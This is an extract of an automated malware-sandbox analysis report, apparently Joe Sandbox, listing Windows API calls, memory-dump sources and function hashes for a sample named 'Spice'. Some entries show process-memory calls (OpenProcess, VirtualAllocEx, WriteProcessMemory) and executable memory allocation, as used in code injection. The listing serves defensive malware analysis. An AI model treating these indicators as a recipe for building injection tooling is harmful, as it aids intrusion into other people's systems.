                                                                                                                                                                                                                                        • Part of subcall function 00ED1CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EC9E4E,?,?,00000034,00000800,?,00000034), ref: 00ED1CE5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00ECA3F7
                                                                                                                                                                                                                                        • Part of subcall function 00ED1C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EC9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00ED1CB0
                                                                                                                                                                                                                                        • Part of subcall function 00ED1BDD: GetWindowThreadProcessId.USER32(?,?), ref: 00ED1C08
                                                                                                                                                                                                                                        • Part of subcall function 00ED1BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EC9E12,00000034,?,?,00001004,00000000,00000000), ref: 00ED1C18
                                                                                                                                                                                                                                        • Part of subcall function 00ED1BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EC9E12,00000034,?,?,00001004,00000000,00000000), ref: 00ED1C2E
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ECA464
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00ECA4B1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 913715a9cb87423dc58be1b89f0332fce820bc5969f1e8b7249a2e6abcda6710
                                                                                                                                                                                                                                      • Instruction ID: 237996736547f9137306801228918f2524acce3eaea9c5a9016cc87f3f90468d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 913715a9cb87423dc58be1b89f0332fce820bc5969f1e8b7249a2e6abcda6710
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 04416C7290021CBFCB14DBA4CD85FDEB7B8EB05304F144199FA55B7280DA716E45CBA1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EF7A86
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EF7A9A
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF7ABE
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                      • Opcode ID: 4c3bca6e1f6c1eb543ece8fb680c9725634055a8a0d32c7beed7a74492402c9c
                                                                                                                                                                                                                                      • Instruction ID: 5a5893a65b83b3ff67efccb6aa442177629de26b2048cdd8aa5f88803c1c0a85
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4c3bca6e1f6c1eb543ece8fb680c9725634055a8a0d32c7beed7a74492402c9c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC219F3260421DABDF218F54CC42FEE3BA9EB48724F121214FF557B190EAB1A8519BA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EF826F
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EF827D
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF8284
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                      • Opcode ID: 5248cef47e29cc3289bada5552994fad8192c4bcd51dddb5fd429df0144adf61
                                                                                                                                                                                                                                      • Instruction ID: d1c69cbd11ea6d26522e32f021d6ef477c10afe81a56e8452b35f8c40667cabe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5248cef47e29cc3289bada5552994fad8192c4bcd51dddb5fd429df0144adf61
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72216DB160420CAFEB10DF54CC85DB737EDEB4A368B181159FA05AB261CB71EC11DAA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EF7360
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF7370
                                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF7395
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                      • Opcode ID: d01adafa503939bdcd205d0c2c178a8447c21513fcb213ac4eac1ae5b23edcf5
                                                                                                                                                                                                                                      • Instruction ID: 4ad775919391a77d03b02cdb32dbd771b48593c04252c0705af5c3581dc80579
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d01adafa503939bdcd205d0c2c178a8447c21513fcb213ac4eac1ae5b23edcf5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9221C23260511CBFDF118F54DC85FBF37AAEB89768F119124FE44AB190CA71AC51ABA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EF7D97
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EF7DAC
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EF7DB9
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                      • Opcode ID: dea06ba8e313fea0f22d0371f4b00fdc47b51d5ffd0ac4e414ba1d5ec506cbc0
                                                                                                                                                                                                                                      • Instruction ID: a97e86e7f68de853cadaa196836c08f8735d761968ce48da594ffebd15a065b8
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dea06ba8e313fea0f22d0371f4b00fdc47b51d5ffd0ac4e414ba1d5ec506cbc0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0911E37224420CBADF209F64CC05FFB7BA9EF89B28F115118FB85B6090D672D851DB20
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84AF7,?), ref: 00E84BB8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E84BCA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2574300362-1355242751
                                                                                                                                                                                                                                      • Opcode ID: 26fc1f47493c52542e8600effad9a988b4954c5fb6a23f897f21884f31cd4c33
                                                                                                                                                                                                                                      • Instruction ID: 29a23081ba1011b30f59daef5569c745b1b5ae701e16f06e6c205e7fe1725a02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 26fc1f47493c52542e8600effad9a988b4954c5fb6a23f897f21884f31cd4c33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5FD0C2704003138FE3206F30DC0874672D4EF04344F009C2AD889D2590DE70C480D741
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E84B44,?,00E849D4,?,?,00E827AF,?,00000001), ref: 00E84B85
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E84B97
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2574300362-3689287502
                                                                                                                                                                                                                                      • Opcode ID: cf63951f820a2bb86d48a3546b48973443de406fbdd9867a2c487b1547dc2532
                                                                                                                                                                                                                                      • Instruction ID: d12b572ec6f37e55ce59509d5c2b8798e8644823cc8ef9c97d847886d7a58d9d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf63951f820a2bb86d48a3546b48973443de406fbdd9867a2c487b1547dc2532
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 45D017B05547238FD720AF75EC18B06B6E4AF05355F11982AD88AE2690EA70E880EB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00EF1696), ref: 00EF1455
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EF1467
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                      • API String ID: 2574300362-4033151799
                                                                                                                                                                                                                                      • Opcode ID: 5afa0fa2e923418fa9e20c0f4aba1d59097c39c479657826f24279d880b8e5d3
                                                                                                                                                                                                                                      • Instruction ID: b35c2772e7ad3759fc2288b5738e729be145bd6ca31a7e3d53b8b69e4ea74681
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5afa0fa2e923418fa9e20c0f4aba1d59097c39c479657826f24279d880b8e5d3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81D0173051072ACFD7209F75D80971AB6E4AF56399F11C86A98E6E21A0EA70D8C0DA91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,?,00E85E3D), ref: 00E855FE
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00E85610
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2574300362-192647395
                                                                                                                                                                                                                                      • Opcode ID: 60ee7b1bd8e1af4647ae3d01ecca076b9bd349c51e036788b8528144b96a5c1c
                                                                                                                                                                                                                                      • Instruction ID: b63c633c4a669d8e019664a17183829830bb0abe4183d5e38a96845d16cde201
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ee7b1bd8e1af4647ae3d01ecca076b9bd349c51e036788b8528144b96a5c1c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0D01775960B12DFE720AF35C808716B6E5AF05359F51982AD88AE2291EE70C880EB91
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(kernel32.dll,00000001,00EE93DE,?,00F00980), ref: 00EE97D8
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EE97EA
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                      • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 2574300362-199464113
                                                                                                                                                                                                                                      • Opcode ID: 348b1078cfcb9ca275536aaaa26216a303701616e999fee3fe25840929a83df1
                                                                                                                                                                                                                                      • Instruction ID: 1202ee33546cc335dc93fe5a1c76d167f7103c576c33906264999b705389cb95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 348b1078cfcb9ca275536aaaa26216a303701616e999fee3fe25840929a83df1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31D017705607278FD7209F36E888706B6E4BF09395F11982ADC86E2290EF70D880EA52
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 77b595f8e3b60e30886ee54c59ee739643608bdddd803a384df398c9b1c99c67
                                                                                                                                                                                                                                      • Instruction ID: 17b2266dcc96e5aafd3346648ec0fbae7ed736666d63b077d13f2d29212995c2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 77b595f8e3b60e30886ee54c59ee739643608bdddd803a384df398c9b1c99c67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89C17E75A00216EFDB14CF94CA84EAEB7B5FF48714B10959CE845EB251DB32ED82CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00EEE7A7
                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 00EEE7EA
                                                                                                                                                                                                                                        • Part of subcall function 00EEDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00EEDEAE
                                                                                                                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00EEE9EA
                                                                                                                                                                                                                                      • _memmove.LIBCMT ref: 00EEE9FD
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620200692.0000000000F39000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_e70000_Spice.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3659485706-0
                                                                                                                                                                                                                                      • Opcode ID: 72587a620ceee0e103c644fad5b29a7fe719ee600096075bd78a087e5bf2e4f7
                                                                                                                                                                                                                                      • Instruction ID: 9cff6500aad21bf8030adb16c180e4fc837a040b765e4821dfecf122b2209d17
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 72587a620ceee0e103c644fad5b29a7fe719ee600096075bd78a087e5bf2e4f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFC18971A08345CFC714DF29C48096ABBE4FF89718F04996EF899AB351D731E906CB82
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00EE87AD
                                                                                                                                                                                                                                      • CoUninitialize.OLE32 ref: 00EE87B8
                                                                                                                                                                                                                                        • Part of subcall function 00EFDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00EE8A0E,?,00000000), ref: 00EFDF71
                                                                                                                                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00EE87C3
                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 00EE8A94
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000B.00000002.2620040939.0000000000E71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620022529.0000000000E70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620109098.0000000000F26000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000B.00000002.2620163767.0000000000F30000.00000004.00000001.01000000.00000005.sdmpDownload File
